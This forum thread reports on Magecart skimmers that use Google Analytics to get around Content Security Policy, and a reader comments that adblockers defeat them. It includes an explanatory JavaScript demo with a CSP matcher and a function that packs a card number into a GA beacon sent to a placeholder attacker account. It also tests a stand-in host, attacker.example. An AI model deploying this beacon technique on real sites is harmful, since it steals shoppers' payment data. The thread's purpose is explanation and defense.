Hackers use Google Analytics to steal credit cards, bypass CSP

silversurfer (Thread author)
Hackers are using Google's servers and the Google Analytics platform to steal credit card information submitted by customers of online stores.

A new method to bypass Content Security Policy (CSP) using the Google Analytics API disclosed last week has already been deployed in ongoing Magecart attacks designed to scrape credit card data from several dozen e-commerce sites.

This new tactic takes advantage of the fact that e-commerce web sites using Google's web analytics service for tracking visitors are whitelisting Google Analytics domains in their CSP configuration (a security standard used to block the execution of untrusted code on web apps).

New research from web security companies Sansec and PerimeterX shows that using CSP to prevent credit card skimming attacks is pointless on sites that also deploy Google Analytics (GA) as threat actors can use it to exfiltrate harvested data to their own accounts.
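The CSP interaction the article describes, as an added example that is not from the article or from the Sansec/PerimeterX research it cites: a simplified CSP source-expression matcher (not a full CSP Level 3 implementation) run against the kind of policy a store that uses Google Analytics typically ships. The store origin `shop.example`, the policy text and the beacon URL are constructed for illustration; `UA-000000-0` is a placeholder tracking ID, and the card number is the well-known Visa test number.

```javascript
// Simplified CSP Level 3 source-expression matcher (added example, not from the
// article). Handles 'self', 'none', '*', scheme-only sources and host sources with
// optional scheme, wildcard subdomain, port and path; nonces, hashes and the
// 'unsafe-*' keywords are out of scope. Uses the URL/URLSearchParams globals that
// Node and browsers provide.

function parsePolicy(policyText) {
  // "directive src src; directive src" -> Map(directive -> [src, ...])
  const directives = new Map();
  for (const part of policyText.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

function sourceMatches(expr, url, pageOrigin) {
  const e = expr.toLowerCase();
  const scheme = url.protocol.slice(0, -1); // "https:" -> "https"
  if (e === "'none'") return false;
  if (e === "'self'") return url.origin === pageOrigin;
  if (e === "*") return scheme === "http" || scheme === "https"; // simplification
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) {                        // scheme-source, e.g. "https:"
    return e === url.protocol || (e === "http:" && scheme === "https");
  }
  const m = e.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/*]+)(?::(\d+|\*))?(\/[^?#]*)?$/);
  if (!m) return false;
  const [, srcScheme, wildcard, host, port, path] = m;
  if (srcScheme) {
    if (srcScheme !== scheme && !(srcScheme === "http" && scheme === "https")) return false;
  } else if (scheme !== "http" && scheme !== "https") {
    return false; // simplification: a scheme-less host source matches only http(s)
  }
  if (wildcard ? !url.hostname.endsWith("." + host) : url.hostname !== host) return false;
  if (port && port !== "*") {
    const urlPort = url.port || (scheme === "https" ? "443" : "80");
    if (port !== urlPort) return false;
  }
  if (path) {
    // Trailing "/" means prefix match, otherwise the path must match exactly.
    // Note what is never compared: the query string.
    if (path.endsWith("/") ? !url.pathname.startsWith(path) : url.pathname !== path) return false;
  }
  return true;
}

function isAllowed(policyText, directive, urlText, pageOrigin) {
  const directives = parsePolicy(policyText);
  // Fetch directives (script-src, connect-src, img-src, ...) fall back to default-src.
  const sources = directives.get(directive) || directives.get("default-src");
  if (!sources) return true; // nothing governs this directive: unrestricted
  const url = new URL(urlText);
  return sources.some((src) => sourceMatches(src, url, pageOrigin));
}

// Constructed policy: the shape a store that runs Google Analytics typically ships.
const STORE_POLICY =
  "default-src 'self'; " +
  "script-src 'self' https://www.google-analytics.com; " +
  "connect-src 'self' https://www.google-analytics.com; " +
  "img-src 'self' https://www.google-analytics.com";
const PAGE_ORIGIN = "https://shop.example"; // assumed store origin (constructed)

// Constructed skimmer beacon: a Measurement Protocol hit to the same collect
// endpoint the store's own tag uses, but whose tid selects an account the
// attacker controls. UA-000000-0 is a placeholder, not a real property ID.
function skimmerBeacon(tid, cardNumber, expiry) {
  const params = new URLSearchParams({
    v: "1", tid, cid: "1", t: "event", ec: "checkout", ea: cardNumber + "|" + expiry,
  });
  return "https://www.google-analytics.com/collect?" + params.toString();
}

function demo() {
  const beacon = skimmerBeacon("UA-000000-0", "4111111111111111", "12/29");
  return {
    // The skimmer's hit is indistinguishable from the store's own tag's: allowed.
    beaconAllowedAsImage: isAllowed(STORE_POLICY, "img-src", beacon, PAGE_ORIGIN),
    beaconAllowedAsFetch: isAllowed(STORE_POLICY, "connect-src", beacon, PAGE_ORIGIN),
    // The same policy does block an attacker-owned host: CSP works as designed,
    // it just cannot see which GA account the data is addressed to.
    attackerHostBlocked: !isAllowed(STORE_POLICY, "connect-src",
      "https://attacker.example/collect", PAGE_ORIGIN),
    // Pinning the path does not help either: the tid lives in the query string.
    pathPinnedStillAllowed: isAllowed(
      STORE_POLICY.replace(/https:\/\/www\.google-analytics\.com/g,
        "https://www.google-analytics.com/collect"),
      "img-src", beacon, PAGE_ORIGIN),
  };
}

console.log(demo());
```

The point the matcher makes concrete: a CSP source expression compares scheme, host, port and path, never the query string, so a policy that allows `https://www.google-analytics.com` for the store's own tag allows every hit to that host, including one whose `tid` routes the data to an attacker's account. Tightening the host entry to the `/collect` path changes nothing. Blocking `attacker.example` still works, which is why the article calls the bypass a consequence of the allow-list rather than a CSP bug.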

SeriousHoax
Adblockers like uBlock Origin, with its default filter lists (EasyPrivacy, Peter Lowe's Ad and tracking server list), and AdGuard's AdGuard Tracking Protection, which block the "googleanalytics" script or the domain as a whole, should keep users safe against this attack.
Edit: I couldn't even comment on this with EasyPrivacy enabled because the title of this post contains the words "Google Analytics" in it 😂